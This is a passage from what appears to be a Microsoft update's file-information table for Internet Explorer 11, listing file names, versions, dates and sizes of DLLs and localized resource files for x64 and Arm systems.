\nieuinit.inf| Not versioned| 12-Mar-2015| 18:55| 16,303 \niesysprep.dll| 11.0.9600.17416| 30-Oct-2014| 19:56| 90,624 \nieframe.dll| 11.0.9600.20112| 13-Aug-2021| 19:47| 13,881,856 \nie9props.propdesc| Not versioned| 23-Sep-2013| 19:34| 2,843 \nwow64_ieframe.ptxml| Not versioned| 5-Feb-2014| 21:43| 24,486 \njscript9.dll| 11.0.9600.20112| 13-Aug-2021| 19:52| 4,119,040 \njscript9diag.dll| 11.0.9600.19963| 12-Feb-2021| 18:37| 620,032 \njscript.dll| 5.8.9600.20112| 13-Aug-2021| 19:56| 653,824 \nvbscript.dll| 5.8.9600.20112| 13-Aug-2021| 20:04| 498,176 \nactxprxy.dll| 6.3.9600.20045| 4-Jun-2021| 21:32| 1,049,600 \nhlink.dll| 6.3.9600.19101| 18-Jul-2018| 20:55| 99,328 \npngfilt.dll| 11.0.9600.19963| 12-Feb-2021| 18:49| 58,368 \nurlmon.dll| 11.0.9600.20112| 13-Aug-2021| 19:19| 1,342,976 \nWininetPlugin.dll| 6.3.9600.17416| 30-Oct-2014| 20:12| 35,328 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 46,592 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 56,320 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 57,856 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 11:17| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 47,616 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 49,152 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 55,296 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 45,056 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 39,424 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 35,840 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 53,760 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:29| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:29| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 52,736 \nwininet.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:44| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:27| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 31,232 \ninetcpl.cpl| 11.0.9600.20045| 4-Jun-2021| 21:30| 2,058,752 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 307,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 293,888 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 290,304 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 299,008 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 303,104 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 20:58| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 283,648 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 291,840 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 299,520 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 275,968 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 293,376 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 258,048 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 256,512 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 288,256 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 285,184 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 297,472 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 290,816 \nmshtml.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:45| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 286,208 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 281,600 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 286,720 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:42| 292,352 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 242,176 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 243,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 243,200 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:25| 60,416 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:26| 46,080 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 51,712 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 54,272 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 11:10| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 45,056 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:13| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 39,936 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 39,424 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 51,200 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:02| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:46| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:05| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 35,328 \nwininet.dll| 11.0.9600.20112| 13-Aug-2021| 19:27| 4,387,840 \njsproxy.dll| 11.0.9600.17416| 30-Oct-2014| 20:16| 47,104 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 114,176 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:09| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 124,928 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 122,880 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 130,048 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 138,240 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18666| 16-Apr-2017| 1:51| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 131,584 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 117,760 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 122,368 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 134,144 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:13| 107,008 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 1:46| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:11| 127,488 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:11| 128,512 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 88,064 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 1:47| 82,944 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 120,320 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 125,952 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:25| 128,000 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:25| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20112| 13-Aug-2021| 21:45| 124,416 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 13:56| 121,856 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:03| 115,712 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 74,752 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:09| 75,776 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 75,776 \niedkcs32.dll| 18.0.9600.20045| 4-Jun-2021| 21:34| 333,312 \ninstall.ins| Not versioned| 13-Aug-2021| 17:57| 464 \nieapfltr.dat| 10.0.9301.0| 23-Sep-2013| 19:20| 616,104 \nieapfltr.dll| 11.0.9600.20112| 13-Aug-2021| 19:16| 710,656 \nlicmgr10.dll| 11.0.9600.17416| 30-Oct-2014| 20:03| 27,136 \niedvtool.dll| 11.0.9600.20045| 4-Jun-2021| 22:45| 772,608 \nDiagnosticsTap.dll| 11.0.9600.19963| 12-Feb-2021| 18:28| 175,104 \nF12Tools.dll| 11.0.9600.19963| 12-Feb-2021| 18:27| 256,000 \nmsfeedsbs.mof| Not versioned| 21-Aug-2013| 16:49| 1,574 \nmsfeedsbs.dll| 11.0.9600.19650| 11-Feb-2020| 4:57| 52,736 \nmsfeedssync.exe| 11.0.9600.17416| 30-Oct-2014| 20:25| 11,264 \nIEAdvpack.dll| 11.0.9600.17416| 30-Oct-2014| 20:14| 112,128 \nielowutil.exe| 11.0.9600.19404| 9-Jul-2019| 20:06| 221,184 \nieproxy.dll| 11.0.9600.19963| 12-Feb-2021| 17:45| 310,784 \nIEShims.dll| 11.0.9600.20045| 4-Jun-2021| 21:12| 290,304 \niexpress.exe| 11.0.9600.17416| 30-Oct-2014| 20:27| 152,064 \nwextract.exe| 11.0.9600.17416| 30-Oct-2014| 20:28| 137,728 \nimgutil.dll| 11.0.9600.19963| 12-Feb-2021| 17:59| 40,448 \nExtExport.exe| 11.0.9600.17416| 30-Oct-2014| 20:20| 25,600 \njsdbgui.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 459,776 \njsprofilerui.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 579,584 \nMshtmlDac.dll| 11.0.9600.19867| 12-Oct-2020| 21:43| 64,000 \nnetworkinspection.dll| 11.0.9600.19846| 23-Sep-2020| 20:28| 1,075,200 \npdm.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 442,992 \nmsdbg2.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 315,008 \npdmproxy100.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 99,984 \nmsrating.dll| 11.0.9600.19507| 5-Oct-2019| 19:57| 168,960 \nicrav03.rat| Not versioned| 23-Sep-2013| 19:25| 8,798 \nticrf.rat| Not versioned| 23-Sep-2013| 19:26| 1,988 \niertutil.dll| 11.0.9600.20064| 14-Jun-2021| 21:16| 2,308,608 \ninseng.dll| 11.0.9600.17416| 30-Oct-2014| 19:56| 91,136 \nVGX.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 818,176 \nurl.dll| 11.0.9600.17416| 30-Oct-2014| 20:24| 235,520 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,066,432 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,121,216 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,075,136 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,063,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,314,240 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,390,528 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,034,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:39| 2,033,152 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,255,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,061,312 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,326,016 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,019,840 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,071,040 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,082,816 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,170,368 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,153,984 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,291,712 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,283,520 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,052,096 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,301,952 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,093,056 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,075,648 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,299,392 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,094,592 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,316,800 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,305,536 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,278,912 \nieframe.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:48| 2,286,080 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,060,288 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,315,776 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,278,912 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,324,992 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,098,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 1,890,304 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 1,890,304 \nieinstal.exe| 11.0.9600.18921| 9-Feb-2018| 21:35| 475,648 \ninetcomm.dll| 6.3.9600.20112| 13-Aug-2021| 19:39| 880,640 \nINETRES.dll| 6.3.9600.16384| 21-Aug-2013| 21:14| 84,480 \n \n### \n\n__\n\nInternet Explorer 11 on all supported Arm-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nactxprxy.dll| 6.3.9600.20045| 4-Jun-2021| 20:58| 1,064,960 \nhlink.dll| 6.3.9600.19101| 18-Jul-2018| 20:30| 68,608 \npngfilt.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 47,616 \nurlmon.dll| 11.0.9600.20112| 13-Aug-2021| 18:58| 1,035,264 \niexplore.exe| 11.0.9600.19867| 12-Oct-2020| 22:01| 807,816 \nWininetPlugin.dll| 6.3.9600.16384| 21-Aug-2013| 19:52| 33,792 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 46,592 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 56,320 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 57,856 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 10:19| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 47,616 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 49,152 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 55,296 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 45,056 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 39,424 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 35,840 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:10| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:09| 53,760 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:07| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 52,736 \nwininet.dll.mui| 11.0.9600.20112| 13-Aug-2021| 20:44| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:07| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:06| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:06| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:06| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:06| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:08| 31,232 \nhtml.iec| 2019.0.0.20045| 4-Jun-2021| 21:28| 320,000 \ninetcpl.cpl| 11.0.9600.20045| 4-Jun-2021| 21:05| 2,007,040 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 307,200 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 293,888 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 290,304 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 289,280 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 299,008 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 303,104 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 282,112 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:16| 282,112 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:52| 296,960 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 283,648 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 291,840 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 299,520 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 275,968 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:52| 290,816 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 293,376 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 296,960 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 258,048 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 256,512 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 289,280 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 288,256 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 285,184 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 295,424 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 297,472 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 295,424 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 294,400 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 294,400 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 290,816 \nmshtml.dll.mui| 11.0.9600.20112| 13-Aug-2021| 20:47| 290,816 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:50| 286,208 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:48| 281,600 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:48| 286,720 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:48| 292,352 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:48| 242,176 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 243,200 \nmshtml.dll.mui| 11.0.9600.19507| 5-Oct-2019| 20:51| 243,200 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 73,728 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 78,848 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 15-Aug-2014| 18:39| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 74,752 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:19| 62,464 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 75,264 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:28| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:27| 73,216 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 41,472 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 37,888 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:18| 70,656 \nF12Resources.dll.mui| 